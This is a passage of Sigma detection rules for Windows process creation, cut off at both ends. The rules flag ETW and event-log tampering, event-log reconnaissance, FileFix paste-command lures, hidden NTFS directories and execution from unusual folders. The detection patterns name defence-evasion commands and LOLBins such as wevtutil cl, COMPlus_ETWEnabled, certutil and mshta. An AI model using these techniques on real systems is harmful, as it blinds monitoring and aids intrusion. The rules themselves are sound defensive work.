           - '🧑🏿‍❤️‍🧑🏽'\n            - '🧑🏿‍❤️‍🧑🏾'\n            - '👨🏻‍❤️‍💋‍👨🏻'\n            - '👨🏻‍❤️‍💋‍👨🏼'\n            - '👨🏻‍❤️‍💋‍👨🏽'\n            - '👨🏻‍❤️‍💋‍👨🏾'\n            - '👨🏻‍❤️‍💋‍👨🏿'\n            - '👨🏼‍❤️‍💋‍👨🏻'\n            - '👨🏼‍❤️‍💋‍👨🏼'\n            - '👨🏼‍❤️‍💋‍👨🏽'\n            - '👨🏼‍❤️‍💋‍👨🏾'\n            - '👨🏼‍❤️‍💋‍👨🏿'\n            - '👨🏽‍❤️‍💋‍👨🏻'\n            - '👨🏽‍❤️‍💋‍👨🏼'\n            - '👨🏽‍❤️‍💋‍👨🏽'\n            - '👨🏽‍❤️‍💋‍👨🏾'\n            - '👨🏽‍❤️‍💋‍👨🏿'\n            - '👨🏾‍❤️‍💋‍👨🏻'\n            - '👨🏾‍❤️‍💋‍👨🏼'\n            - '👨🏾‍❤️‍💋‍👨🏽'\n            - '👨🏾‍❤️‍💋‍👨🏾'\n            - '👨🏾‍❤️‍💋‍👨🏿'\n            - '👨🏿‍❤️‍💋‍👨🏻'\n            - '👨🏿‍❤️‍💋‍👨🏼'\n            - '👨🏿‍❤️‍💋‍👨🏽'\n            - '👨🏿‍❤️‍💋‍👨🏾'\n            - '👨🏿‍❤️‍💋‍👨🏿'\n            - '👩🏻‍❤️‍💋‍👨🏻'\n            - '👩🏻‍❤️‍💋‍👨🏼'\n            - '👩🏻‍❤️‍💋‍👨🏽'\n            - '👩🏻‍❤️‍💋‍👨🏾'\n            - '👩🏻‍❤️‍💋‍👨🏿'\n            - '👩🏻‍❤️‍💋‍👩🏻'\n            - '👩🏻‍❤️‍💋‍👩🏼'\n            - '👩🏻‍❤️‍💋‍👩🏽'\n            - '👩🏻‍❤️‍💋‍👩🏾'\n            - '👩🏻‍❤️‍💋‍👩🏿'\n            - '👩🏼‍❤️‍💋‍👨🏻'\n            - '👩🏼‍❤️‍💋‍👨🏼'\n            - '👩🏼‍❤️‍💋‍👨🏽'\n            - '👩🏼‍❤️‍💋‍👨🏾'\n            - '👩🏼‍❤️‍💋‍👨🏿'\n            - '👩🏼‍❤️‍💋‍👩🏻'\n            - '👩🏼‍❤️‍💋‍👩🏼'\n            - '👩🏼‍❤️‍💋‍👩🏽'\n            - '👩🏼‍❤️‍💋‍👩🏾'\n            - '👩🏼‍❤️‍💋‍👩🏿'\n            - '👩🏽‍❤️‍💋‍👨🏻'\n            - '👩🏽‍❤️‍💋‍👨🏼'\n            - '👩🏽‍❤️‍💋‍👨🏽'\n            - '👩🏽‍❤️‍💋‍👨🏾'\n            - '👩🏽‍❤️‍💋‍👨🏿'\n            - '👩🏽‍❤️‍💋‍👩🏻'\n            - '👩🏽‍❤️‍💋‍👩🏼'\n            - '👩🏽‍❤️‍💋‍👩🏽'\n            - '👩🏽‍❤️‍💋‍👩🏾'\n            - '👩🏽‍❤️‍💋‍👩🏿'\n            - '👩🏾‍❤️‍💋‍👨🏻'\n            - '👩🏾‍❤️‍💋‍👨🏼'\n            - '👩🏾‍❤️‍💋‍👨🏽'\n            - '👩🏾‍❤️‍💋‍👨🏾'\n            - '👩🏾‍❤️‍💋‍👨🏿'\n            - '👩🏾‍❤️‍💋‍👩🏻'\n            - '👩🏾‍❤️‍💋‍👩🏼'\n            - '👩🏾‍❤️‍💋‍👩🏽'\n            - '👩🏾‍❤️‍💋‍👩🏾'\n            - '👩🏾‍❤️‍💋‍👩🏿'\n            - '👩🏿‍❤️‍💋‍👨🏻'\n            - '👩🏿‍❤️‍💋‍👨🏼'\n            - '👩🏿‍❤️‍💋‍👨🏽'\n            - '👩🏿‍❤️‍💋‍👨🏾'\n            - 
'👩🏿‍❤️‍💋‍👨🏿'\n            - '👩🏿‍❤️‍💋‍👩🏻'\n            - '👩🏿‍❤️‍💋‍👩🏼'\n            - '👩🏿‍❤️‍💋‍👩🏽'\n            - '👩🏿‍❤️‍💋‍👩🏾'\n            - '👩🏿‍❤️‍💋‍👩🏿'\n            - '🧑🏻‍❤️‍💋‍🧑🏼'\n            - '🧑🏻‍❤️‍💋‍🧑🏽'\n            - '🧑🏻‍❤️‍💋‍🧑🏾'\n            - '🧑🏻‍❤️‍💋‍🧑🏿'\n            - '🧑🏼‍❤️‍💋‍🧑🏻'\n            - '🧑🏼‍❤️‍💋‍🧑🏽'\n            - '🧑🏼‍❤️‍💋‍🧑🏾'\n            - '🧑🏼‍❤️‍💋‍🧑🏿'\n            - '🧑🏽‍❤️‍💋‍🧑🏻'\n            - '🧑🏽‍❤️‍💋‍🧑🏼'\n            - '🧑🏽‍❤️‍💋‍🧑🏾'\n            - '🧑🏽‍❤️‍💋‍🧑🏿'\n            - '🧑🏾‍❤️‍💋‍🧑🏻'\n            - '🧑🏾‍❤️‍💋‍🧑🏼'\n            - '🧑🏾‍❤️‍💋‍🧑🏽'\n            - '🧑🏾‍❤️‍💋‍🧑🏿'\n            - '🧑🏿‍❤️‍💋‍🧑🏻'\n            - '🧑🏿‍❤️‍💋‍🧑🏼'\n            - '🧑🏿‍❤️‍💋‍🧑🏽'\n            - '🧑🏿‍❤️‍💋‍🧑🏾'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml",
    "content": "title: ETW Logging Tamper In .NET Processes Via CommandLine\nid: 41421f44-58f9-455d-838a-c398859841d4\nstatus: test\ndescription: |\n    Detects changes to environment variables related to ETW logging via the CommandLine.\n    This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2022-12-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'COMPlus_ETWEnabled'\n            - 'COMPlus_ETWFlags'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml",
    "content": "title: ETW Trace Evasion Activity\nid: a238b5d0-ce2d-4414-a676-7a531b3d13d6\nstatus: test\ndescription: |\n    Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://abuse.io/lockergoga.txt\n    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nauthor: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community'\ndate: 2019-03-22\nmodified: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562.006\n    - car.2016-04-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_clear_1:\n        CommandLine|contains|all:\n            - 'cl'\n            - '/Trace'\n    selection_clear_2:\n        CommandLine|contains|all:\n            - 'clear-log'\n            - '/Trace'\n    selection_disable_1:\n        CommandLine|contains|all:\n            - 'sl'\n            - '/e:false'\n    selection_disable_2:\n        CommandLine|contains|all:\n            - 'set-log'\n            - '/e:false'\n    selection_disable_3:   # ETW provider removal from a trace session\n        CommandLine|contains|all:\n            - 'logman'\n            - 'update'\n            - 'trace'\n            - '--p'\n            - '-ets'\n    selection_pwsh_remove:   # Autologger provider removal\n        CommandLine|contains: 'Remove-EtwTraceProvider'\n    selection_pwsh_set:   # Provider “Enable” property modification\n        CommandLine|contains|all:\n            - 'Set-EtwTraceProvider'\n            - '0x11'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml",
    "content": "title: Suspicious Eventlog Clearing or Configuration Change Activity\nid: cc36992a-4671-4f21-a91d-6c2b72a2edf5\nstatus: stable\ndescription: |\n    Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\n    This technique were seen used by threat actors and ransomware strains in order to evade defenses.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee\n    - https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/\n    - https://www.linkedin.com/posts/huntress-labs_when-a-sketchy-incident-hits-your-network-activity-7304940371078238208-Th_l/?utm_source=share&utm_medium=member_desktop&rcm=ACoAAAJTlRcB28IaUtg03HUU-IdliwzoAL1flGc\n    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\nauthor: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-09-26\nmodified: 2025-03-12\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - attack.t1562.002\n    - car.2016-04-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n  
  selection_wevtutil_cmd:\n        CommandLine|contains:\n            - 'clear-log '          # clears specified log\n            - ' cl '                # short version of 'clear-log'\n            - 'set-log '            # modifies config of specified log. could be uset to set it to a tiny size\n            - ' sl '                # short version of 'set-log'\n            - 'lfn:'                # change log file location and name\n    selection_other_ps_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    selection_other_ps_cmd:\n        - CommandLine|contains:\n              - 'Clear-EventLog '\n              - 'Remove-EventLog '\n              - 'Limit-EventLog '\n              - 'Clear-WinEvent '\n        - CommandLine|contains|all:\n              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)\n              - 'ClearLog'\n        - CommandLine|contains|all:\n              - 'Diagnostics.EventLog'\n              - 'Clear'\n    selection_other_wmi:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wmic.exe'\n        CommandLine|contains: 'ClearEventLog'\n    filter_main_msiexec:\n        # Example seen during office update/installation:\n        #   ParentImage: C:\\Windows\\SysWOW64\\msiexec.exe\n        #   CommandLine: \"C:\\WINDOWS\\system32\\wevtutil.exe\" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false\n        ParentImage:\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains: ' sl '\n    condition: (all of selection_wevtutil_*) or (all of selection_other_ps_*) or (selection_other_wmi) and not 1 of filter_main_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored 
environment\n    - Maintenance activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml",
    "content": "title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities\nid: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\nrelated:\n    - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\n    This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\n    - https://www.group-ib.com/blog/apt41-world-tour-2021/\n    - https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1\n    - http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today\n    - https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/\n    - https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-09-09\nmodified: 2025-12-02\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1552\n    - attack.t1087\nlogsource:\n    category: process_creation\n    
product: windows\ndetection:\n    selection_wmi:\n        CommandLine|contains|all:\n            - 'Select'\n            - 'Win32_NTLogEvent'\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n    selection_wevtutil_cli:\n        CommandLine|contains:\n            - ' qe '\n            - ' query-events '\n    selection_wmic_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains: ' ntevent'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Get-WinEvent '\n            - 'get-eventlog '\n    selection_logs_name:\n        CommandLine|contains:\n            # Note: Add more event log channels that are interesting for attackers\n            - 'Microsoft-Windows-PowerShell'\n            - 'Microsoft-Windows-Security-Auditing'\n            - 'Microsoft-Windows-TerminalServices-LocalSessionManager'\n            - 'Microsoft-Windows-TerminalServices-RemoteConnectionManager'\n            - 'Microsoft-Windows-Windows Defender'\n            - 'PowerShellCore'\n            - 'Security'\n            - 'Windows PowerShell'\n    selection_logs_eid:\n        CommandLine|contains:\n            # Note: We use the \"?\" to account for both a single and a double quote\n            # Note: Please add additional interesting event IDs\n            # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. 
Rare FPs might occur with legit queries to EIDs from different providers.\n            # This covers EID 4624 and 4628 from Security Log\n            - '-InstanceId 462?'\n            - '.eventid -eq 462?'\n            - '.ID -eq 462?'\n            - 'EventCode=?462?'\n            - 'EventIdentifier=?462?'\n            - 'System[EventID=462?]'\n            # This covers EID 4778 from Security Log\n            - '-InstanceId 4778'\n            - '.eventid -eq 4778'\n            - '.ID -eq 4778'\n            - 'EventCode=?4778?'\n            - 'EventIdentifier=?4778?'\n            - 'System[EventID=4778]'\n            # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 25'\n            - '.eventid -eq 25'\n            - '.ID -eq 25'\n            - 'EventCode=?25?'\n            - 'EventIdentifier=?25?'\n            - 'System[EventID=25]'\n            # This covers EID 1149 from Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational log\n            - '-InstanceId 1149'\n            - '.eventid -eq 1149'\n            - '.ID -eq 1149'\n            - 'EventCode=?1149?'\n            - 'EventIdentifier=?1149?'\n            - 'System[EventID=1149]'\n            # This covers EID 21 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 21'\n            - '.eventid -eq 21'\n            - '.ID -eq 21'\n            - 'EventCode=?21?'\n            - 'EventIdentifier=?21?'\n            - 'System[EventID=21]'\n            # This covers EID 22 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 22'\n            - '.eventid -eq 22'\n            - '.ID -eq 22'\n            - 'EventCode=?22?'\n            - 'EventIdentifier=?22?'\n            - 'System[EventID=22]'\n    condition: 1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or 
selection_cmdlet)\nfalsepositives:\n    - Legitimate usage of the utility by administrators to query the event log\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml",
    "content": "title: Potentially Suspicious Execution From Parent Process In Public Folder\nid: 69bd9b97-2be2-41b6-9816-fb08757a4d1a\nstatus: test\ndescription: |\n    Detects a potentially suspicious execution of a parent process located in the \"\\Users\\Public\" folder executing a child process containing references to shell or scripting binaries and commandlines.\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-25\nmodified: 2024-07-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1564\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: ':\\Users\\Public\\'\n    selection_child:\n        - Image|endswith:\n              - '\\bitsadmin.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - CommandLine|contains:\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cscript'\n              - 'mshta'\n              - 'powershell'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_execution_path.yml",
    "content": "title: Process Execution From A Potentially Suspicious Folder\nid: 3dfd06d2-eaf4-4532-9555-68aca59f57c4\nstatus: test\ndescription: Detects a potentially suspicious execution from an uncommon folder.\nreferences:\n    - https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt\n    - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses\n    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/\n    - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2019-01-16\nmodified: 2024-07-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\All Users\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\NetworkService\\'\n            - ':\\Windows\\addins\\'\n            - ':\\Windows\\debug\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\Help\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\Media\\'\n            - ':\\Windows\\repair\\'\n            - ':\\Windows\\security\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - '$Recycle.bin'\n            - '\\config\\systemprofile\\'\n            - '\\Intel\\Logs\\'\n            - '\\RSA\\MachineKeys\\'\n    filter_optional_ibm:\n        Image|startswith: 'C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\'\n    filter_optional_citrix:\n        Image|startswith: 'C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\'\n        Image|endswith: '\\CitrixReceiverUpdater.exe'\n    condition: selection and not 1 of 
filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml",
    "content": "title: Suspicious File Characteristics Due to Missing Fields\nid: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43\nstatus: test\ndescription: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe\nreferences:\n    - https://securelist.com/muddywater/88059/\n    - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection\nauthor: Markus Neis, Sander Wiebing\ndate: 2018-11-22\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.006\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection1:\n        Description: '\\?'\n        FileVersion: '\\?'\n    selection2:\n        Description: '\\?'\n        Product: '\\?'\n    selection3:\n        Description: '\\?'\n        Company: '\\?'\n    folder:\n        Image|contains: '\\Downloads\\'\n    condition: (selection1 or selection2 or selection3) and folder\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_filefix_execution_pattern.yml",
    "content": "title: Suspicious FileFix Execution Pattern\nid: b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2\nrelated:\n    - id: 4fee3d51-8069-4a4c-a0f7-924fcaff2c70\n      type: similar\n    - id: 4be03877-d5b6-4520-85c9-a5911c0a656c\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.\n    This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,\n    which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.\n    The clipboard content usually contains commands that download and execute malware, such as information stealing tools.\nreferences:\n    - https://mrd0x.com/filefix-clickfix-alternative/\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/ # phishing lure directly asking users to open file explorer and paste command\n    - https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/\nauthor: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-24\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exec_parent:\n        # This is case where phishing pages trick users to paste commands in browser file upload dialog\n        ParentImage|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        CommandLine|contains: '#'\n    selection_cli_lolbin:\n        CommandLine|contains:\n            - '%comspec%'\n            - 'bitsadmin'\n            - 'certutil'\n            - 'cmd'\n            - 'cscript'\n            - 'curl'\n            - 'finger'\n            - 'mshta'\n            - 'powershell'\n            
- 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'schtasks'\n            - 'wget'\n            - 'wscript'\n    selection_cli_captcha:\n        CommandLine|contains:\n            - 'account'\n            - 'anti-bot'\n            - 'botcheck'\n            - 'captcha'\n            - 'challenge'\n            - 'confirmation'\n            - 'fraud'\n            - 'human'\n            - 'identification'\n            - 'identificator'\n            - 'identity'\n            - 'robot'\n            - 'validation'\n            - 'verification'\n            - 'verify'\n    condition: selection_exec_parent and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml",
    "content": "title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS\nid: 07aa184a-870d-413d-893a-157f317f6f58\nrelated:\n    - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate\n      type: similar\n    - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN\n      type: similar\nstatus: test\ndescription: Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'gatherNetworkInfo.vbs'\n    filter:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml",
    "content": "title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI\nid: 0900463c-b33b-49a8-be1d-552a3b553dae\nrelated:\n    - id: a8f866e1-bdd4-425e-a27a-37619238d9c7\n      type: similar\nstatus: test\ndescription: |\n    Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"\nreferences:\n    - https://twitter.com/pfiatde/status/1681977680688738305\n    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\n    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3\nauthor: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)\ndate: 2023-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage\n        CommandLine|contains: '::$index_allocation'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml",
    "content": "title: Writing Of Malicious Files To The Fonts Folder\nid: ae9b0bd7-8888-4606-b444-0ed7410cb728\nstatus: test\ndescription: Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.\nreferences:\n    - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/\nauthor: Sreeman\ndate: 2020-04-21\nmodified: 2022-03-08\ntags:\n    - attack.t1211\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'echo'\n            - 'copy'\n            - 'type'\n            - 'file createnew'\n            - 'cacls'\n    selection_2:\n        CommandLine|contains: 'C:\\Windows\\Fonts\\'\n    selection_3:\n        CommandLine|contains:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.msh'\n            - '.reg'\n            - '.scr'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.pl'\n            - '.inf'\n            - '.cpl'\n            - '.hta'\n            - '.msi'\n            - '.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml",
    "content": "title: Potential Homoglyph Attack Using Lookalike Characters\nid: 32e280f1-8ad4-46ef-9e80-910657611fbc\nstatus: test\ndescription: |\n    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\n    This is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\n    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\nreferences:\n    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\n    - http://www.irongeek.com/homoglyph-attack-generator.php\nauthor: Micah Babinski, @micahbabinski\ndate: 2023-05-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1036.003\n   # - attack.t1036.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_upper:\n        CommandLine|contains:\n            - \"\\u0410\" # А/A\n            - \"\\u0412\" # 